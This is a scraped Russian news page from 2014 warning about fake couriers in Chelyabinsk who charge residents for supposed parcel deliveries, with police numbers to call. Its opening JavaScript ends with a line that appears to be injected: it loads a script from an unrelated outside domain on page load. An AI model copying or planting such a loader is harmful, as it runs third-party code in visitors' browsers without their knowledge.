, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Будьте осторожны: в Челябинске появился новый вид мошенничества

В Челябинске появился новый вид мошенничества – у людей пытаются выманить деньги за доставку посылки, якобы пришедшей на имя одного из жильцов квартиры. Бдительные челябинцы уже разместили сообщения в социальных сетях с предостережениями о действиях аферистов.

Схема, по которой действуют аферисты, проста. Они звонят в дверь, представляясь курьерами. После этого они называют фамилию человека, зарегистрированного в квартире, на имя которого якобы пришла посылка. Затем они предлагают жертве расписаться в получении, убедиться в целостности посылки и заплатить за ее доставку. Суммы, которые запрашивают лжекурьеры за свою "работу", находятся в пределах тысячи рублей.

В городском управлении Полиции сообщили, что пока официальных заявлений по поводу такого рода мошенничества в органы не поступало. В случае если в дверь постучали аферисты, следует незамедлительно позвонить по телефонам: 267-77-07, 267-77-04 или 02.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
16:07 - 26 марта 2014
|
автор: U-RSS
|
(471)
|
(0)

Комментарии (0)

Я человек
Я бот